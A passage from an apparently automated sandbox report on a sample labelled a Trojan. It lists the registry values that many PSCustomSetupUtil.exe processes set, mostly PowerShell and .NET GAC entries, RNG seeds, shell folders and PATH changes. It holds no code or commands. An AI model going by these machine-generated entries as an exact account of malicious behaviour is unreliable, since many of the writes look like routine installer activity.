"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C8 37 0A 98 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3068 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 44 7F F9 85 6B 73 9B B4 5E DD 04 9C C7 F9 1F"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "20 36 83 96 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"

The process PSCustomSetupUtil.exe:3232 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 E5 A3 00 CD FA D7 64 FB 30 99 77 53 8F E0 47"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "54 91 20 97 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:2300 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A 24 2F A4 4B 84 94 4A 64 FC 18 46 CE FC 94"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2484 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 64 93 21 A2 88 CE E0 39 C7 E8 20 2F AE 7A 4E"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 8D 6F 9C CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:2548 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 70 61 BC EA 4C C2 B4 54 CC AD E3 BE 21 43 29"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "A4 EE 90 9C CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3344 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 1C 03 59 21 54 3E 7D AD B8 8E 31 DF 3C EF 7B"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 DE 4D 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:2388 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 3C E8 65 1E 7D 25 5C FD A3 B7 FA C9 D8 E6 B3"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1E E0 20 9C CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 DD 38 F5 EE FB A5 9B 9D D9 F7 F3 36 CE 7C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3664 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 92 7C ED B8 AA D0 3E 5A 3C BF C8 8B 50 D0 36"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "76 84 37 98 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:2600 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 F9 A1 08 D2 40 1A E2 2D 60 2F DF 3C BB A0 B8"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "EA B1 B4 9C CA AB D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:2876 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 54 83 DB FF D0 FA 75 A4 E5 35 3F C6 FF A9 A8"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 4E D1 9C CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:3884 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 41 10 97 6E 7B 2D 09 31 A4 E6 C3 AE E8 A0 C2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7A F2 E7 98 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:2284 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 87 65 57 5A 97 0C 29 AE 7F 64 96 59 83 7F B8"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3932 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA D9 9A 70 5A 35 6B 22 05 AF CB 13 FC D1 63 49"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "74 7A 10 99 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:2976 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 47 D0 E5 05 1D EE E7 50 DF C6 8D D1 A5 6B 0C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "CC 4B 58 96 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:3704 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 20 75 8F 8B 32 51 94 35 6A 57 87 78 B3 51 DE"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "70 0C 60 98 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:3544 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE EC 97 D2 D9 56 79 FC D6 71 F3 32 22 E1 CF 1C"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C0 88 DA 97 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3140 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 CA AD A8 FB F2 18 C6 13 5C F5 B3 4D DC AA 0B"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "9E 95 C3 96 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:3784 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 87 43 FE 6A 9E 0A DC 56 E2 5B FB F1 6D D9 A5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "78 BB 8F 98 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:3224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 1B B7 08 25 1C 8C DF 2D 7A E7 F4 F9 56 FE AC"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "F2 7F EE 96 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:3984 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 FB D3 DA 07 EB 27 54 03 B0 CB 62 D9 B8 5E 70"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 C7 3D 99 CA AB D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3848 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 82 C9 7F 07 50 C1 DC 02 0B 41 B3 C8 38 A8 D2"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "CC A5 BA 98 CA AB D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process regsvr32.exe:3056 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

